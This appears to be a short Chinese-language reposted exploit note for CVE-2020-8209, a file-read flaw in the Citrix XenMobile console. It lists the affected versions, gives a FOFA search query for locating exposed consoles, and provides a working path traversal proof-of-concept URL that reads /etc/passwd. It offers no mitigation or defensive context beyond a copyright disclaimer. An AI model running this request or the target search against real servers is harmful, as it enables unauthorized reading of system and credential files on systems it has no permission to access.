(CVE-2020-8209)XenMobile-控制台存在任意文件讀取漏洞


0x01 影響版本

  RP2之前的XenMobile服務器10.12
  RP4之前的XenMobile服務器10.11
  RP6之前的XenMobile服務器10.10
  10.9 RP5之前的XenMobile服務器

0x02 fofa語法

  app="XenMobile-控制台"


應用截圖

0x03 POC

  /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM